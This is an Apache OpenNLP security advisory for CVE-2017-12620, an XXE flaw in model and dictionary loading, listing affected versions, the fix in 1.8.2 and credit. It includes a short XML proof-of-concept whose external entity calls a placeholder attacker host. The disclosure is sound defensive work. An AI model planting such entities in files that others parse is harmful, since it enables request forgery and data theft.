| //// |
| Licensed to the Apache Software Foundation (ASF) under one |
| or more contributor license agreements. See the NOTICE file |
| distributed with this work for additional information |
| regarding copyright ownership. The ASF licenses this file |
| to you under the Apache License, Version 2.0 (the |
| "License"); you may not use this file except in compliance |
| with the License. You may obtain a copy of the License at |
| |
| http://www.apache.org/licenses/LICENSE-2.0 |
| |
| Unless required by applicable law or agreed to in writing, |
| software distributed under the License is distributed on an |
| "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY |
| KIND, either express or implied. See the License for the |
| specific language governing permissions and limitations |
| under the License. |
| //// |
| = CVE-2017-12620 - Apache OpenNLP XXE vulnerability |
| Apache OpenNLP |
| 2017-10-02 |
| :jbake-type: post |
| :jbake-tags: community |
| :jbake-status: published |
| :category: news |
| :idprefix: |
| |
| Severity: Medium |
| |
| Vendor: |
| The Apache Software Foundation |
| |
| Versions Affected: |
| |
| * OpenNLP 1.5.0 to 1.5.3 |
| * OpenNLP 1.6.0 |
| * OpenNLP 1.7.0 to 1.7.2 |
| * OpenNLP 1.8.0 to 1.8.1 |
| |
| Description: |
| When loading models or dictionaries that contain XML it is possible to |
| perform an XXE attack, since OpenNLP is a library, this only affects |
| applications that load models or dictionaries from untrusted sources. |
| |
| Mitigation: |
| All users who load models or XML dictionaries from untrusted sources |
| should update to 1.8.2. |
| |
| |
| Example: |
| |
| An attacker can place this: |
| [source,xml,indent=0,subs=attributes+] |
| ---- |
| <?xml version="1.0" ?> |
| <!DOCTYPE r [ |
| <!ELEMENT r ANY > |
| <!ENTITY sp SYSTEM "http://evil.attacker.com/"> |
| ]> |
| <r>&sp;</r> |
| ---- |
| |
| Inside one of the XML files, either a dictionary or embedded inside a |
| model package, to demonstrate this vulnerability. |
| |
| Credit: |
| This issue was discovered by Nishil Shah of Salesforce. |
| |
| --The Apache OpenNLP Team |